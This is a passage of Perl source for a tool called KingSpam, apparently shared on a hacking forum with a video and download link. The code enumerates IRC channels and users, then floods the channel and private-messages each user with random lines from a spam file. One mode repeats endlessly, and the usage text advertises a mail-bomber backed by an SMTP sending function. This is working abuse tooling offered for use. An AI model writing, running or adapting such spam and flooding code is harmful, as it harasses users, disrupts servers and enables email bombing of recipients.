sub spam_canal {

    my $hostname = $_[0];
    my $port     = $_[1];
    my $nombre   = $_[2];
    my $canal    = $_[3];
    my $archivo  = $_[4];

    printear("[+] Connecting to ");
    print $hostname. "\n\n";

    my @nicks    = buscar_usuarios( $_[0], $_[1], $_[2], $_[3] );
    my $contador = 0;
    my $termine  = 0;
    my $timeout  = $_[5];

    my @spamnow = loadfile($archivo);

    if (
        my $socket = new IO::Socket::INET(
            PeerAddr => $hostname,
            PeerPort => $port,
            Proto    => "tcp"
        )
      )
    {

        print $socket "NICK $nombre\r\n";
        print $socket "USER $nombre 1 1 1 1\r\n";
        print $socket "JOIN $canal\r\n";

        printear_titulo("[+] Users Found : ");
        print int(@nicks) . "\n\n";

        while ( my $log = <$socket> ) {
            chomp $log;

            if ( $log =~ /^PING(.*)$/i ) {
                print $socket "PONG $1\r\n";
            }

            if ( $contador eq "0" ) {
                printear("[+] Spam in channel : ");
                print $canal. "\n";
                sleep($timeout);
                print $socket "PRIVMSG $canal "
                  . $spamnow[ rand(@spamnow) ] . "\r\n";
                $contador++;
            }

            foreach $names (@nicks) {
                chomp $names;
                sleep($timeout);
                unless ( $nombre eq $names ) {
                    $names =~ s/\@//;
                    $names =~ s/\+//;
                    print $socket "PRIVMSG $names $spamnow[rand(@spamnow)]\r\n";
                    printear("[+] Spam to user $names : ");
                    print "OK\n";
                }
                $termine++;
            }

            if ( $termine eq int(@nicks) ) {
                $socket->close();
                last;
            }

        }
    }
    else {
        printear("[-] Error\n");
        $socket->close();
    }

}

sub spam_canal_forever {

    my $hostname = $_[0];
    my $port     = $_[1];
    my $nombre   = $_[2];
    my $canal    = $_[3];
    my $archivo  = $_[4];

    printear("[+] Connecting to ");
    print $hostname. "\n\n";

    my @nicks    = buscar_usuarios( $_[0], $_[1], $_[2], $_[3] );
    my $contador = 0;
    my $termine  = 0;
    my $timeout  = $_[5];

    my @spamnow = loadfile($archivo);

    if (
        my $socket = new IO::Socket::INET(
            PeerAddr => $hostname,
            PeerPort => $port,
            Proto    => "tcp"
        )
      )
    {

        print $socket "NICK $nombre\r\n";
        print $socket "USER $nombre 1 1 1 1\r\n";
        print $socket "JOIN $canal\r\n";

        printear_titulo("[+] Users Found : ");
        print int(@nicks) . "\n\n";

        while ( my $log = <$socket> ) {
            chomp $log;

            while (1) {
                if ( $log =~ /^PING(.*)$/i ) {
                    print $socket "PONG $1\r\n";
                }

                if ( $contador eq "0" ) {
                    printear("[+] Spam in channel : ");
                    print $canal. "\n";
                    sleep($timeout);
                    print $socket "PRIVMSG $canal "
                      . $spamnow[ rand(@spamnow) ] . "\r\n";
                    $contador++;
                }

                foreach $names (@nicks) {
                    chomp $names;
                    sleep($timeout);
                    unless ( $nombre eq $names ) {
                        $names =~ s/\@//;
                        $names =~ s/\+//;
                        print $socket
                          "PRIVMSG $names $spamnow[rand(@spamnow)]\r\n";
                        printear("[+] Spam to user $names : ");
                        print "OK\n";
                    }
                    $termine++;
                }
                $contador = 0;
                print "\n";
            }

            if ( $termine eq int(@nicks) ) {
                $socket->close();
                last;
            }

        }
    }
    else {
        printear("[-] Error\n");
        $socket->close();
    }

}

sub buscar_usuarios {

    my $hostname = $_[0];
    my $port     = $_[1];
    my $nombre   = $_[2];
    my $canal    = $_[3];

    if (
        my $socket = new IO::Socket::INET(
            PeerAddr => $hostname,
            PeerPort => $port,
            Proto    => "tcp"
        )
      )
    {

        print $socket "NICK $nombre\r\n";
        print $socket "USER $nombre 1 1 1 1\r\n";
        print $socket "JOIN $canal\r\n";

        while ( my $log = <$socket> ) {

            chomp $log;

            if ( $log =~ /^PING(.*)$/i ) {
                print $socket "PONG $1\r\n";
            }

            if ( $log =~ m/:(.*) 353 (.*) = (.*) :(.*)/ig ) {
                my $pro = $4;
                chop $pro;
                $pro =~ s/$nombre//;
                my @nicks = split " ", $pro;
                $socket->close();
                return @nicks;
            }

        }
    }
}

sub buscar_canales {

    my @resultado;

    my $hostname = $_[0];
    my $port     = $_[1];
    my $nombre   = $_[2];

    if (
        my $socket = new IO::Socket::INET(
            PeerAddr => $hostname,
            PeerPort => $port,
            Proto    => "tcp"
        )
      )
    {

        print $socket "NICK $nombre\r\n";
        print $socket "USER $nombre 1 1 1 1\r\n";
        print $socket "LIST\r\n";

        while ( my $log = <$socket> ) {

            if ( $log =~ /322 (.*?) (.*?) (.*?) :/ ) {
                my $canal    = $2;
                my $cantidad = $3;
                push( @resultado, $canal . "-soy_un_limite-" . $cantidad );
            }

            if ( $log =~ /:End of \/LIST/ ) {
                last;
            }

        }

        $socket->close;

        return @resultado;

    }

}

sub listar_canales {

    my $host = $_[0];
    my $port = $_[1];
    my $nick = $_[2];
    my $file = $_[3];

    printear_titulo("[+] Serching channels ...\n\n");
    my @encontrados = buscar_canales( $host, $port, $nick );
    if ( int(@encontrados) eq "0" or int(@encontrados) eq "1" ) {
        printear_titulo("[-] Channels not found\n");
    }
    else {
        printearf_titulo( "Channels", "Users" );
        print "\n";
        for my $encontrado (@encontrados) {
            if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) {
                my $canal    = $1;
                my $cantidad = $2;
                printearf( $canal, $cantidad );

                if ( $file ne "" ) {
                    savefile( $file, $canal );
                }

            }
        }
    }

}

sub sendmail {

## Function Based on : http://code.activestate.com/lists/pdk/5351/
## Credits : Thanks to Phillip Richcreek and Eric Promislow

    my (
        $host, $port, $username, $password, $from, $cc,
        $bcc,  $to,   $asunto,   $mensaje,  $file
    ) = @_;

    $correo = Win32::OLE->new('CDO.Message');

    $correo->Configuration->Fields->SetProperty( "Item",
        'http://schemas.microsoft.com/cdo/configuration/sendusername',
        $username );
    $correo->Configuration->Fields->SetProperty( "Item",
        'http://schemas.microsoft.com/cdo/configuration/sendpassword',
        $password );
    $correo->Configuration->Fields->SetProperty( "Item",
        'http://schemas.microsoft.com/cdo/configuration/smtpserver', $host );
    $correo->Configuration->Fields->SetProperty( "Item",
        'http://schemas.microsoft.com/cdo/configuration/smtpserverport',
        $port );
    $correo->Configuration->Fields->SetProperty( "Item",
        'http://schemas.microsoft.com/cdo/configuration/smtpusessl', 1 );
    $correo->Configuration->Fields->SetProperty( "Item",
        'http://schemas.microsoft.com/cdo/configuration/sendusing', 2 );
    $correo->Configuration->Fields->SetProperty( "Item",
        'http://schemas.microsoft.com/cdo/configuration/smtpauthenticate', 1 );
    $correo->Configuration->Fields->Update();

    if ( -f $file ) {
        $correo->AddAttachment($file);
    }

    $correo->{From}     = $from;
    $correo->{CC}       = $cc;
    $correo->{BCC}      = $bcc;
    $correo->{To}       = $to;
    $correo->{Subject}  = $asunto;
    $correo->{TextBody} = $mensaje;
    $correo->Send();

}

# More Functions

sub printearf_titulo {
    cprintf( "\x0310" . "%-32s  %s" . "\x030\n", $_[0], $_[1] );
}

sub printearf {
    cprintf( "\x036" . "%-32s  %s" . "\x030\n", $_[0], $_[1] );
}

sub printear {
    cprint( "\x036" . $_[0] . "\x030" );
    return "";
}

sub printear_logo {
    cprint( "\x037" . $_[0] . "\x030" );
    return ""

}

sub printear_titulo {
    cprint( "\x0310" . $_[0] . "\x030" );
    return "";
}

sub savefile {
    open( SAVE, ">>" . $_[0] );
    print SAVE $_[1] . "\n";
    close SAVE;
}

sub loadfile {
    if ( -f $_[0] ) {
        my @words;
        my @r;
        open( FILE, $_[0] );
        @words = <FILE>;
        close FILE;
        for (@words) {
            push( @r, $_ );
        }
        return (@r);
    }
    else {
        printear("\n[-] File not found\n\n");
        copyright();
    }
}

sub sintax {
    printear("[+] Sintax : ");
    print "perl $0 <option> <value>\n";
    printear("\n[+] Options : \n\n");
    print
"-get_channels <host> -port <port> -nick <nick> -savefile <file> : Get & Save Channels of a server\n";
    print
"-get_users <host> -port <port> -channel <channel> -nick <nick> -savefile <file> : Get & Save Channels of a server\n";
    print
"-spam_channel <host> -port <port> -channel <channel> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a Channel\n";
    print
"-spam_channel_forever <host> -port <port> -channel <channel> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a Channel Forever\n";
    print
"-spam_server <host> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a server\n";
    print
"-spam_servers_list <file> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in multiple servers\n";
    print
"-spam_targets <file> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in servers & channels saved\n";
    print "-mailbomber : Open MailBomber\n";
    printear("\n[+] Example : \n\n");
    print "perl kingspam.pl -get_channels localhost\n";
    print "perl kingspam.pl -get_users localhost -channel #locos\n";
    print
"perl kingspam.pl -spam_channel localhost -channel #locos -spam_file c:/spam.txt\n";
    print
"perl kingspam.pl -spam_channel_forever localhost -channel #locos -spam_file c:/spam.txt\n";
    print "perl kingspam.pl -spam_server localhost -spam_file c:/spam.txt\n";
    print
"perl kingspam.pl -spam_servers_file c:/servers.txt -nick ClapTrap -spam_file c:/spam.txt\n";
    print
      "perl kingspam.pl -spam_targets c:/servers.txt -spam_file c:/spam.txt\n";
    print "perl kingspam.pl -mailbomber\n";
}

sub head {
    printear_logo("\n-- == KingSpam 1.0 == --\n\n\n");
}

sub copyright {
    printear_logo("\n\n-- == (C) Doddy Hackman 2015 == --\n\n");
    exit(1);
}

# The End ?

  
  Un video con ejemplos de uso :
  
  [youtube=640,360]https://www.youtube.com/watch?v=TPYeDBPKRdw[/youtube]
  
  Si quieren bajar el programa lo pueden hacer de aca :
  
  SourceForge.